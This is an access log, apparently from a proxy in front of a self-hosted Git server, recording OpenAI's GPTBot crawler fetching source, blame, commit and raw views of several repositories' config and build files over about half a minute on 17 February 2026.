"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/vite.config.ts" -[17/Feb/2026:16:37:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11514] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/.gitignore" -[17/Feb/2026:16:37:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/.gitignore" -[17/Feb/2026:16:37:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/vite.config.ts" -[17/Feb/2026:16:37:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fobj%2fDebug%2fnet8.0%2f.NETCoreApp%2cVersion%3dv8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 21415] [Gzip 3.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:16:37:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/vite.config.ts" -[17/Feb/2026:16:37:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11980] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/vite.config.ts" -[17/Feb/2026:16:37:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9938] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:16:37:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11981] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/vite.config.ts" -[17/Feb/2026:16:37:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10905] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/types.ts" -[17/Feb/2026:16:37:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/vite.config.ts" -[17/Feb/2026:16:37:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/compare/main...main?expand=1" [Client 74.7.227.38] [Length 8398] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" -[17/Feb/2026:16:37:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11217] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:37:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11217] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:37:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10528] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:37:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11218] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:37:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14257] [Gzip 8.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:37:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:37:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9937] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=mostcomment&state=all&type=all" -[17/Feb/2026:16:37:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11217] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:37:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11218] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:37:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11218] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:37:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/compare/main...main" [Client 74.7.227.38] [Length 8384] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/compare/main...main?expand=1" -[17/Feb/2026:16:37:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/compare/main..main" [Client 74.7.227.38] [Length 8362] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/compare/main...main?expand=1" -[17/Feb/2026:16:37:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:37:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:37:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:37:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10173] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:37:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10172] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:37:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9956] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=nearduedate&state=all&type=all" -[17/Feb/2026:16:37:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:37:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:37:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:37:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10170] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:37:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10173] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:37:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10171] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:37:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10173] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:37:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:38:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:38:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:38:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=nearduedate&state=all&type=all" -[17/Feb/2026:16:38:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:38:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:38:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:38:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:38:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:38:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11220] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:38:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 74.7.227.38] [Length 9957] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:16:38:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/types.ts?display=source" [Client 74.7.227.38] [Length 11542] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/types.ts" -[17/Feb/2026:16:38:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11519] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/.gitignore" -[17/Feb/2026:16:38:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 